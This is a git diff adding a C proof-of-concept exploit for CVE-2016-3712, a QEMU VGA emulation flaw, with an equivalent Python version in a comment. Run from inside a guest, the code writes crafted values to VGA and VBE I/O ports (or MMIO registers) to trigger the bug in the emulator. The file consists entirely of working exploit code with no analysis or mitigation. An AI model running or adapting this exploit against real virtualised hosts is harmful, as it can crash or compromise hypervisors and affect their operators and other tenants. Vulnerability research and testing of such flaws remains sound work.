1 files changed, 71 insertions, 0 deletions

diff --git a/cve-2016-3712.c b/cve-2016-3712.c
new file mode 100644
index 0000000..d94c26c
--- /dev/null
+++ b/cve-2016-3712.c
@@ -0,0 +1,71 @@
+/*
+ * python version:
+ * -------------------------------------------------------------
+
+from periphery import MMIO
+import time
+mmio_base = 0xfebd4000
+mmio_range = 0x1000
+mmio = MMIO(mmio_base, mmio_range)
+mmio.write16(0x0504, 0x4000)
+time.sleep(1) # wait screen refreshing
+
+mmio.write8(0x040E, 0x85)
+mmio.write8(0x040F, 0xB4)
+mmio.write8(0x0404, 0x49)
+mmio.write8(0x0405, 0xFC)
+time.sleep(1) # wait screen refreshing
+
+mmio.write8(0x0507, 0x20)
+
+ * -------------------------------------------------------------
+ * below is the c version, not requiring the vga mmio bar,
+ * using io port access to vga and vbe ports instead.
+ *
+ * see docs/specs/standard-vga.txt in qemu repo for mmio bar spec.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <sys/io.h>
+
+int main(int argc, char *argv[])
+{
+    if (ioperm(0x3c0, 0x20, 1) < 0) {
+        perror("ioperm vga");
+        exit(1);
+    }
+    if (ioperm(0x1ce, 0x04, 1) < 0) {
+        perror("ioperm vbe");
+        exit(1);
+    }
+
+    fprintf(stderr, "#1 ... \n");
+    // mmio.write16(0x0504, 0x4000)
+    outw(0x0002, 0x1ce);
+    outw(0x4000, 0x1d0);
+    sleep(1);
+
+    fprintf(stderr, "#2 ... \n");
+    // mmio.write8(0x040E, 0x85)
+    outb(0x85, 0x3ce);
+    // mmio.write8(0x040F, 0xB4)
+    outb(0xb4, 0x3cf);
+    // mmio.write8(0x0404, 0x49)
+    outb(0x49, 0x3c4);
+    // mmio.write8(0x0405, 0xFC)
+    outb(0xfc, 0x3c5);
+    sleep(1);
+
+    // mmio.write8(0x0507, 0x20)
+    fprintf(stderr, "#3 ... \n");
+    outw(0x0003, 0x1ce);
+    outw(0x0020, 0x1d0);
+    sleep(1);
+
+    fprintf(stderr, "done\n");
+    exit(0);
+}